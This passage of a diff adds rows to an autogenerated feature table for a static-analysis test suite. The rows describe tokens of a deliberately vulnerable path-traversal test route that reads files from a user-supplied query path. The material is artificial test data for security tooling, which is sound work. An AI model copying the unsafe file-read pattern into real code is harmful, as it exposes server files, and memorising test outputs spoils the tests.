url | | autogenerated/TaintedPath/normalizedPaths.js:126:53:126:56 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:129:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:129:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:129:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:129:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:129:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:129:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:136:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:136:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:136:2 | app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:136:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:136:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:1:136:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:5:129:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:5:129:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:5:129:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:129:9:129:26 | '/coerce-relative' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:129:9:129:26 | '/coerce-relative' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:129:9:129:26 | '/coerce-relative' | calleeImports | express | @@ -8208,6 +72812,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:129:9:129:26 | '/coerce-relative' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:129:9:129:26 | '/coerce-relative' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:129:9:129:26 | '/coerce-relative' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | fs | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | pathModule | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:129:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -8215,11 +72834,71 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | (req, r ... OT OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:129:29:136:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:30:129:32 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:129:35:129:37 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:129:35:129:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:129:35:129:37 | res | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:129:35:129:37 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:129:35:129:37 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:10 | path | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path = ... y.path) | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:7:130:49 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:23 | pathModule | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:28 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:28 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:28 | pathModule.join | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:28 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:28 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:130:14:130:49 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:130:25:130:28 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:25:130:28 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:130:25:130:28 | join | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:25:130:28 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:25:130:28 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:130:30:130:32 | '.' | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:130:30:130:32 | '.' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:130:30:130:32 | '.' | calleeImports | path | @@ -8229,6 +72908,16 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:130:30:130:32 | '.' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:130:30:130:32 | '.' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:130:30:130:32 | '.' | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:37 | req | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:43 | req.query | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:35:130:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:130:35:130:48 | req.query.path | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:130:35:130:48 | req.query.path | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:130:35:130:48 | req.query.path | calleeImports | path | @@ -8238,6 +72927,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:130:35:130:48 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:130:35:130:48 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:130:35:130:48 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:130:39:130:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:39:130:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:130:39:130:43 | query | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:39:130:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:39:130:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:130:45:130:48 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:130:45:130:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:130:45:130:48 | path | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:130:45:130:48 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:130:45:130:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:132:7:132:28 | !path.s ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:132:7:132:28 | !path.s ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:132:7:132:28 | !path.s ... h('..') | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:132:7:132:28 | !path.s ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:132:7:132:28 | !path.s ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:11 | path | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:22 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:22 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:22 | path.startsWith | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:22 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:22 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | exceptional return of path.st ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | exceptional return of path.st ... h('..') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | exceptional return of path.st ... h('..') | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | exceptional return of path.st ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | exceptional return of path.st ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | path.st ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | path.st ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | path.st ... h('..') | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | path.st ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:132:8:132:28 | path.st ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:132:13:132:22 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:132:13:132:22 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:132:13:132:22 | startsWith | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:132:13:132:22 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:132:13:132:22 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:132:24:132:27 | '..' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:132:24:132:27 | '..' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:132:24:132:27 | '..' | calleeImports | path | @@ -8247,6 +72976,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:132:24:132:27 | '..' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:132:24:132:27 | '..' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:132:24:132:27 | '..' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:6 | fs | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:133:5:133:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:133:8:133:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:133:8:133:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:133:8:133:19 | readFileSync | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:133:8:133:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:133:8:133:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:133:21:133:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:133:21:133:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:133:21:133:24 | path | calleeImports | fs | @@ -8256,6 +73010,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:133:21:133:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:133:21:133:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:133:21:133:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:6 | fs | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | exceptional 